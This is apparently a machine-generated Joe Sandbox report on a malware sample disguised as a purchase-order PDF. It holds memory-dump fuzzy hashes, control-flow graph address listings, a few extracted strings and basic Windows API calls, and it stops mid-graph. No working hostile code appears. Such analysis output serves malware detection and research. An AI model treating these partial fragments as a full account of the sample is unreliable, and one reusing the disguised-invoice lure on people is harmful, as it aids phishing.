                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b3c950047c8e09b6f7bcca9a1b08006e63d067a17336e407855a5b16ac64eb6e
                                                                                                                                    • Instruction ID: 073ee62cd98720dca59b7fb0639ceff6310a7b3e0282da4605cc026dd6f46953
                                                                                                                                    • Opcode Fuzzy Hash: b3c950047c8e09b6f7bcca9a1b08006e63d067a17336e407855a5b16ac64eb6e
                                                                                                                                    • Instruction Fuzzy Hash: 7D81D374E01208CBDB18DFAAC9916DDBBF2BF88311F64D529D814BB359DB349942CB50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 93ca081028ad3bd78a1b66a117cfb4c75fad85b978d65e2e31857b499889325c
                                                                                                                                    • Instruction ID: c2fc131e189be304308332570a97c4cdf318f074b32a79351d8ce2ef439e7ad7
                                                                                                                                    • Opcode Fuzzy Hash: 93ca081028ad3bd78a1b66a117cfb4c75fad85b978d65e2e31857b499889325c
                                                                                                                                    • Instruction Fuzzy Hash: 9671B275D02228CFDB64DF66C9847DDBBF2BF89301F1491AAD409AB250DB349A86CF40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 71b23abd3591029a74cb395ed546870b9e28b10d1ec1562ff3db0fc536196c68
                                                                                                                                    • Instruction ID: 541285ce6ef6a5123ee9225bb312b88bd7b90ded3f1af587d38c59cf03df424b
                                                                                                                                    • Opcode Fuzzy Hash: 71b23abd3591029a74cb395ed546870b9e28b10d1ec1562ff3db0fc536196c68
                                                                                                                                    • Instruction Fuzzy Hash: 607184B4E01618CFEB68CF6AC945B9DBBF2AF89300F14C1AAD40DA7255DB344A85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 78490dbb98c88112ecfd96b8d8cfc2536a41809d58a1b4e2d5558df7b393a23a
                                                                                                                                    • Instruction ID: 81c9a377808f5e023f6c6bf581699d2a56156f90e3b2635f456673a89a567067
                                                                                                                                    • Opcode Fuzzy Hash: 78490dbb98c88112ecfd96b8d8cfc2536a41809d58a1b4e2d5558df7b393a23a
                                                                                                                                    • Instruction Fuzzy Hash: 037183B5D01618CFEB68CF66C945B9DBBF2AF89300F14C1AAD40DA7255DB344A85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dd72ae798535cb54d887384a8359c142ccddf732c04510b14b58793a170e68a4
                                                                                                                                    • Instruction ID: b612fb21c766ab6b4d2a06e27ba8122e600233b5038dc68f20434ac3b3a6f25d
                                                                                                                                    • Opcode Fuzzy Hash: dd72ae798535cb54d887384a8359c142ccddf732c04510b14b58793a170e68a4
                                                                                                                                    • Instruction Fuzzy Hash: CB616C74A40219CFDB25DF64CA40BADBBB6FF88300F1084A9980977B65DB395E82DF54
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: eedd5c4a811cd5bc9ad5f1deabf25454aabdffdbfce8a6473c385fe79f2abef3
                                                                                                                                    • Instruction ID: c1557cbe7e9c5a42ac90a466677ae79b4f3453098eeff6cc7ec4487e1856bfcc
                                                                                                                                    • Opcode Fuzzy Hash: eedd5c4a811cd5bc9ad5f1deabf25454aabdffdbfce8a6473c385fe79f2abef3
                                                                                                                                    • Instruction Fuzzy Hash: 95616F74A00258CFDB25DF65CA44BADBBB6FF88300F10889A980A77765CB395D82DF54
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5f0c7b528c38a2178c75c83892f54b098e0eab0816a488880d8974f1781c2821
                                                                                                                                    • Instruction ID: 1e45446347ff929bd126881473360041bcbe890ca0855df8805dc70343c23c9d
                                                                                                                                    • Opcode Fuzzy Hash: 5f0c7b528c38a2178c75c83892f54b098e0eab0816a488880d8974f1781c2821
                                                                                                                                    • Instruction Fuzzy Hash: 3C619075D02228CFDB64DF66C9846DDBBB2BF89301F1491EAD409AB250DB359A86CF40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 87adbbf31dbe4a91973e93373fc45e1aa182c72a0812469f2d35b8b32ab331c0
                                                                                                                                    • Instruction ID: f201d293989f3929366e118a084ab23dfc295e011aa7001875bbc4828d08a706
                                                                                                                                    • Opcode Fuzzy Hash: 87adbbf31dbe4a91973e93373fc45e1aa182c72a0812469f2d35b8b32ab331c0
                                                                                                                                    • Instruction Fuzzy Hash: 79619F75D02228CFDB64DF66C9846DDBBF2BF89301F1491EAD409AB250DB349A86CF40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e4aeeeb1b584e3e0e758be351a0670b84b2e9948fdc2e8291f02fab8a791d800
                                                                                                                                    • Instruction ID: 1003aa1a1000768543f310e84df9586dea3297281dde47a010620a520ff4fc6c
                                                                                                                                    • Opcode Fuzzy Hash: e4aeeeb1b584e3e0e758be351a0670b84b2e9948fdc2e8291f02fab8a791d800
                                                                                                                                    • Instruction Fuzzy Hash: 437152B5E01628CFEB68CF66C945B9DBBF2AF89300F14C1AAD40DA7255DB344A85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6198875dc7ba46df45d91377cf105c683da99a7a325c146bf44d3dca75404392
                                                                                                                                    • Instruction ID: b64ed07293a6c136f9029a3478e78e69be2c62464f55bbcfada883c7ec7b48dd
                                                                                                                                    • Opcode Fuzzy Hash: 6198875dc7ba46df45d91377cf105c683da99a7a325c146bf44d3dca75404392
                                                                                                                                    • Instruction Fuzzy Hash: 454149B1D016188BEB58CF6BC9457DAFAF3AFC9300F14C1AAD50CA6264DB740A868F51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 81bf72d1d2d1d3c2593c982d427c354d7682fc3c5276618e6dd6755e888813fe
                                                                                                                                    • Instruction ID: 01a0045dbec9c79a12f3fe9552e9f5d148720e25745f6f564c3825806680d7cd
                                                                                                                                    • Opcode Fuzzy Hash: 81bf72d1d2d1d3c2593c982d427c354d7682fc3c5276618e6dd6755e888813fe
                                                                                                                                    • Instruction Fuzzy Hash: CD4149B1D016189BEB58CF6BCD457C9FAF3AFC9310F14C1AAD50CA6264EB740A858F51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5a9e6a3828f83ae09daba3522067835c4442b7b5269581d136d950936caffabc
                                                                                                                                    • Instruction ID: f42044abb3bdfcf822ccac67c67f1cbb6e8f14ae91f65d5451166d230cfbc376
                                                                                                                                    • Opcode Fuzzy Hash: 5a9e6a3828f83ae09daba3522067835c4442b7b5269581d136d950936caffabc
                                                                                                                                    • Instruction Fuzzy Hash: DF41F8B1E016188BEB58CF6BC94579DFAF3AFC9204F14C1AAC50CA7265DB740A868F51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c5e82586646ab48d663d0f75b0cebab12df67b07c2a882c8224614068e0dc4e6
                                                                                                                                    • Instruction ID: 5efb0234daf457e77afb19ea56a25957025be07f8bebc5b0e5d988e1e117770f
                                                                                                                                    • Opcode Fuzzy Hash: c5e82586646ab48d663d0f75b0cebab12df67b07c2a882c8224614068e0dc4e6
                                                                                                                                    • Instruction Fuzzy Hash: 0C4127B1E016188BEB58CF6BC945789FBF3AFC9214F14C1AAC50CA6264DB740A868F51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b9372f97df679acc7cad6f9343111d4cd65360ab9b6e46db495def1b267e3ded
                                                                                                                                    • Instruction ID: 28c77ab887178ec4573dbf87068aeae053a23335748e02ac7d1aa537b24d779f
                                                                                                                                    • Opcode Fuzzy Hash: b9372f97df679acc7cad6f9343111d4cd65360ab9b6e46db495def1b267e3ded
                                                                                                                                    • Instruction Fuzzy Hash: 564137B1E016188BEB58CF6BC94579DFAF3BFC9204F14C1AAC40CA6265DB740A868F51

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 1566b8-1566ed 1 1566f3-156716 0->1 2 156b1c-156b20 0->2 11 1567c4-1567c8 1->11 12 15671c-156729 1->12 3 156b22-156b36 2->3 4 156b39-156b47 2->4 8 156b49-156b5e 4->8 9 156bb8-156bcd 4->9 18 156b65-156b72 8->18 19 156b60-156b63 8->19 20 156bd4-156be1 9->20 21 156bcf-156bd2 9->21 15 156810-156819 11->15 16 1567ca-1567d8 11->16 24 156738 12->24 25 15672b-156736 12->25 22 156c2f 15->22 23 15681f-156829 15->23 16->15 36 1567da-1567f5 16->36 26 156b74-156bb5 18->26 19->26 27 156be3-156c1e 20->27 21->27 30 156c34-156c4d 22->30 23->2 28 15682f-156838 23->28 31 15673a-15673c 24->31 25->31 70 156c25-156c2c 27->70 34 156847-156853 28->34 35 15683a-15683f 28->35 31->11 38 156742-1567a4 31->38 34->30 41 156859-15685f 34->41 35->34 54 1567f7-156801 36->54 55 156803 36->55 82 1567a6 38->82 83 1567aa-1567c1 38->83 43 156865-156875 41->43 44 156b06-156b0a 41->44 52 156877-156887 43->52 53 156889-15688b 43->53 44->22 47 156b10-156b16 44->47 47->2 47->28 59 15688e-156894 52->59 53->59 60 156805-156807 54->60 55->60 59->44 65 15689a-1568a9 59->65 60->15 66 156809 60->66 68 156957-156982 call 156500 * 2 65->68 69 1568af 65->69 66->15 86 156a6c-156a86 68->86 87 156988-15698c 68->87 72 1568b2-1568c3 69->72 72->30 75 1568c9-1568db 72->75 75->30 78 1568e1-1568f9 75->78 140 1568fb call 156c98 78->140 141 1568fb call 156c88 78->141 81 156901-156911 81->44 85 156917-15691a 81->85 82->83 83->11 88 156924-156927 85->88 89 15691c-156922 85->89 86->2 107 156a8c-156a90 86->107 87->44 92 156992-156996 87->92 88->22 90 15692d-156930 88->90 89->88 89->90 93 156932-156936 90->93 94 156938-15693b 90->94 96 1569be-1569c4 92->96 97 156998-1569a5 92->97 93->94 98 156941-156945 93->98 94->22 94->98 99 1569c6-1569ca 96->99 100 1569ff-156a05 96->100 108 1569b4 97->108 109 1569a7-1569b2 97->109 98->22 102 15694b-156951 98->102 99->100 103 1569cc-1569d5 99->103 104 156a07-156a0b 100->104 105 156a11-156a17 100->105 102->68 102->72 112 1569e4-1569fa 103->112 113 1569d7-1569dc 103->113 104->70 104->105 110 156a23-156a25 105->110 111 156a19-156a1d 105->111 114 156a92-156a9c call 1553a8 107->114 115 156acc-156ad0 107->115 118 1569b6-1569b8 108->118 109->118 116 156a27-156a30 110->116 117 156a5a-156a5c 110->117 111->44 111->110 112->44 113->112 114->115 128 156a9e-156ab3 114->128 115->70 125 156ad6-156ada 115->125 121 156a32-156a37 116->121 122 156a3f-156a55 116->122 117->44 123 156a62-156a69 117->123 118->44 118->96 121->122 122->44 125->70 126 156ae0-156aed 125->126 131 156afc 126->131 132 156aef-156afa 126->132 128->115 137 156ab5-156aca 128->137 134 156afe-156b00 131->134 132->134 134->44 134->70 137->2 137->115 140->81 141->81
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                                                    • API String ID: 0-1435242062
                                                                                                                                    • Opcode ID: d7f22972a91676893e0611209b6232aaf7fb249d126ab401eefcb09cfc36b41e
                                                                                                                                    • Instruction ID: e57aa8e5abe53afcc154598621ecc4c18d3b0eac56c58220785d64dffc12e7b6
                                                                                                                                    • Opcode Fuzzy Hash: d7f22972a91676893e0611209b6232aaf7fb249d126ab401eefcb09cfc36b41e
                                                                                                                                    • Instruction Fuzzy Hash: 23126A30A00609CFCB14CF69D984A9EBBF2FF48315F558569E869DB261DB30ED49CB90

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 255 1519b8-151a13 259 151a35-151a84 255->259 260 151a15-151a34 255->260 264 151a86-151a8d 259->264 265 151a9f 259->265 266 151a96-151a9d 264->266 267 151a8f-151a94 264->267 269 151aa7 265->269 268 151aaa-151abe 266->268 267->268 271 151ad4-151adc 268->271 272 151ac0-151ac7 268->272 269->268 276 151ade-151ae2 271->276 273 151acd-151ad2 272->273 274 151ac9-151acb 272->274 273->276 274->276 277 151ae4-151af9 276->277 278 151b42-151b45 276->278 277->278 285 151afb-151afe 277->285 279 151b47-151b5c 278->279 280 151b8d-151b93 278->280 279->280 287 151b5e-151b62 279->287 282 15268e 280->282 283 151b99-151b9b 280->283 290 152693-152ca1 282->290 283->282 286 151ba1-151ba6 283->286 288 151b00-151b02 285->288 289 151b1d-151b3b call 1502a8 285->289 291 15263c-152640 286->291 292 151bac 286->292 295 151b64-151b68 287->295 296 151b6a-151b88 call 1502a8 287->296 288->289 297 151b04-151b07 288->297 289->278 315 152ca3-152ca5 290->315 316 152cb2-152cba 290->316 293 152647-15268d 291->293 294 152642-152645 291->294 292->291 294->290 294->293 295->280 295->296 296->280 297->278 301 151b09-151b1b 297->301 301->278 301->289 317 152ca7-152ca9 315->317 318 152cab-152cb0 315->318 319 152cbc-152cca 316->319 317->319 318->319 322 152ce0-152ce8 319->322 323 152ccc-152cce 319->323 326 152ceb-152cee 322->326 324 152cd7-152cde 323->324 325 152cd0-152cd5 323->325 324->326 325->326 328 152d05-152d09 326->328 329 152cf0-152cfe 326->329 330 152d22-152d25 328->330 331 152d0b-152d19 328->331 329->328 337 152d00 329->337 332 152d27-152d2b 330->332 333 152d2d-152d62 330->333 331->330 338 152d1b 331->338 332->333 336 152d64-152d7b 332->336 344 152dc4-152dc9 333->344 340 152d81-152d8d 336->340 341 152d7d-152d7f 336->341 337->328 338->330 342 152d97-152da1 340->342 343 152d8f-152d95 340->343 341->344 345 152da9 342->345 346 152da3 342->346 343->345 348 152db1-152dbd 345->348 346->345 348->344
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
                                                                                                                                    • API String ID: 0-499371476
                                                                                                                                    • Opcode ID: 1ff2443dc1c00766160b3046969cad11b2f9f3b8d51e31ac59d18f189291a1c3
                                                                                                                                    • Instruction ID: a902a8e82358c2ab07f849ce20fcdbc6a18c308642b36273783c3fd02c57cfd3
                                                                                                                                    • Opcode Fuzzy Hash: 1ff2443dc1c00766160b3046969cad11b2f9f3b8d51e31ac59d18f189291a1c3
                                                                                                                                    • Instruction Fuzzy Hash: 7742EBA7E1D3E18FC7124B705CB82597FB17B22106BDE459EC8C297287EBA58449C353

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 815 35e60980-35e60a0f GetCurrentProcess 819 35e60a11-35e60a17 815->819 820 35e60a18-35e60a4c GetCurrentThread 815->820 819->820 821 35e60a55-35e60a89 GetCurrentProcess 820->821 822 35e60a4e-35e60a54 820->822 824 35e60a92-35e60aaa 821->824 825 35e60a8b-35e60a91 821->825 822->821 836 35e60aad call 35e60b61 824->836 837 35e60aad call 35e60f41 824->837 825->824 828 35e60ab3-35e60ae2 GetCurrentThreadId 829 35e60ae4-35e60aea 828->829 830 35e60aeb-35e60b4d 828->830 829->830 836->828 837->828
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 35E609FE
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 35E60A3B
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 35E60A78
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 35E60AD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                    • Opcode ID: 8b350f3281156e686ab861eaec97bddf232d40a6abf54c13969621cc7a9623db
                                                                                                                                    • Instruction ID: decc166a99d64dc829502417fed4f6e9d5f7fb495ba86c1addad8af187392b51
                                                                                                                                    • Opcode Fuzzy Hash: 8b350f3281156e686ab861eaec97bddf232d40a6abf54c13969621cc7a9623db
                                                                                                                                    • Instruction Fuzzy Hash: 795147B4D017098FDB04DFA9C689BAEBBF5FF48314F208459D419A7261DB38A980CF65

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1004 3593d548-3593d66d 1023 3593d673-3593d6b9 1004->1023 1024 3593d710-3593d741 1004->1024 1029 3593d6c4-3593d70f 1023->1029 1030 3593d6bb-3593d6bf 1023->1030 1031 3593d747-3593d75e 1024->1031 1030->1029
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4']q$4']q$)4
                                                                                                                                    • API String ID: 0-3007799253
                                                                                                                                    • Opcode ID: 8a8565d0824769b51b1efbb88a7443ef6ed31e34a233d98c9a1e843aa38ea9ec
                                                                                                                                    • Instruction ID: 220535a39c2ffd7a6a1c083dcda151662e1e308bcbe0bd49313aa8447311cd9e
                                                                                                                                    • Opcode Fuzzy Hash: 8a8565d0824769b51b1efbb88a7443ef6ed31e34a233d98c9a1e843aa38ea9ec
                                                                                                                                    • Instruction Fuzzy Hash: 78514B70A002099FCB05EFA8D591A9EBBB6FF89300F108565D045BB266DB35AD45CFA1

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1477 157458-157946 1552 15794c-15795c 1477->1552 1553 157e98-157ecd 1477->1553 1552->1553 1554 157962-157972 1552->1554 1557 157ecf-157ed4 1553->1557 1558 157ed9-157ef7 1553->1558 1554->1553 1556 157978-157988 1554->1556 1556->1553 1559 15798e-15799e 1556->1559 1560 157fbe-157fc3 1557->1560 1570 157f6e-157f7a 1558->1570 1571 157ef9-157f03 1558->1571 1559->1553 1561 1579a4-1579b4 1559->1561 1561->1553 1563 1579ba-1579ca 1561->1563 1563->1553 1564 1579d0-1579e0 1563->1564 1564->1553 1566 1579e6-1579f6 1564->1566 1566->1553 1567 1579fc-157a0c 1566->1567 1567->1553 1569 157a12-157a22 1567->1569 1569->1553 1572 157a28-157e97 1569->1572 1576 157f91-157f9d 1570->1576 1577 157f7c-157f88 1570->1577 1571->1570 1578 157f05-157f11 1571->1578 1587 157fb4-157fb6 1576->1587 1588 157f9f-157fab 1576->1588 1577->1576 1586 157f8a-157f8f 1577->1586 1583 157f36-157f39 1578->1583 1584 157f13-157f1e 1578->1584 1589 157f50-157f5c 1583->1589 1590 157f3b-157f47 1583->1590 1584->1583 1596 157f20-157f2a 1584->1596 1586->1560 1587->1560 1588->1587 1598 157fad-157fb2 1588->1598 1594 157fc4-157fe6 1589->1594 1595 157f5e-157f65 1589->1595 1590->1589 1602 157f49-157f4e 1590->1602 1603 157ff6 1594->1603 1604 157fe8 1594->1604 1595->1594 1599 157f67-157f6c 1595->1599 1596->1583 1608 157f2c-157f31 1596->1608 1598->1560 1599->1560 1602->1560 1607 157ff8-157ff9 1603->1607 1604->1603 1606 157fef-157ff4 1604->1606 1606->1607 1608->1560
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $]q$$]q
                                                                                                                                    • API String ID: 0-127220927
                                                                                                                                    • Opcode ID: d8ed68870fe5326cfdff048a79c31ba18a3da697e8ab92cc4f03cbb43b65eb13
                                                                                                                                    • Instruction ID: 89da1a27b87db8a37de47b40f6f729d863f3036d83ad393bfbc549c722992ab8
                                                                                                                                    • Opcode Fuzzy Hash: d8ed68870fe5326cfdff048a79c31ba18a3da697e8ab92cc4f03cbb43b65eb13
                                                                                                                                    • Instruction Fuzzy Hash: 12522F74A00218CFEB25DBA4C951B9EBBB6EF84300F1080ADD51A6B3A6CF395E45DF51

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1922 154f00-154f22 1923 154f24-154f28 1922->1923 1924 154f38-154f43 1922->1924 1925 154f50-154f57 1923->1925 1926 154f2a-154f36 1923->1926 1927 154f49-154f4b 1924->1927 1928 154feb-155017 1924->1928 1930 154f77-154f80 1925->1930 1931 154f59-154f60 1925->1931 1926->1924 1926->1925 1929 154fe3-154fe8 1927->1929 1936 15501e-155076 1928->1936 2023 154f82 call 154ef0 1930->2023 2024 154f82 call 154f00 1930->2024 1931->1930 1933 154f62-154f6d 1931->1933 1935 154f73-154f75 1933->1935 1933->1936 1934 154f88-154f8a 1937 154f92-154f9a 1934->1937 1938 154f8c-154f90 1934->1938 1935->1929 1954 155085-155097 1936->1954 1955 155078-15507e 1936->1955 1941 154f9c-154fa1 1937->1941 1942 154fa9-154fab 1937->1942 1938->1937 1940 154fad-154fcc call 155968 1938->1940 1948 154fe1 1940->1948 1949 154fce-154fd7 1940->1949 1941->1942 1942->1929 1948->1929 2028 154fd9 call 159eb0 1949->2028 2029 154fd9 call 159f6d 1949->2029 1951 154fdf 1951->1929 1957 15509d-1550a1 1954->1957 1958 15512b-15512d 1954->1958 1955->1954 1959 1550b1-1550be 1957->1959 1960 1550a3-1550af 1957->1960 2026 15512f call 1552c0 1958->2026 2027 15512f call 1552c8 1958->2027 1968 1550c0-1550ca 1959->1968 1960->1968 1961 155135-15513b 1962 155147-15514e 1961->1962 1963 15513d-155143 1961->1963 1966 155145 1963->1966 1967 1551a9-155208 1963->1967 1966->1962 1984 15520f-155233 1967->1984 1971 1550f7-1550fb 1968->1971 1972 1550cc-1550db 1968->1972 1973 155107-15510b 1971->1973 1974 1550fd-155103 1971->1974 1981 1550dd-1550e4 1972->1981 1982 1550eb-1550f5 1972->1982 1973->1962 1979 15510d-155111 1973->1979 1977 155105 1974->1977 1978 155151-1551a2 1974->1978 1977->1962 1978->1967 1983 155117-155129 1979->1983 1979->1984 1981->1982 1982->1971 1983->1962 1991 155235-155237 1984->1991 1992 155239-15523b 1984->1992 1993 1552b1-1552b4 1991->1993 1994 15523d-155241 1992->1994 1995 15524c-15524e 1992->1995 1999 155247-15524a 1994->1999 2000 155243-155245 1994->2000 2001 155261-155267 1995->2001 2002 155250-155254 1995->2002 1999->1993 2000->1993 2006 155292-155294 2001->2006 2007 155269-155290 2001->2007 2003 155256-155258 2002->2003 2004 15525a-15525f 2002->2004 2003->1993 2004->1993 2009 15529b-15529d 2006->2009 2007->2009 2013 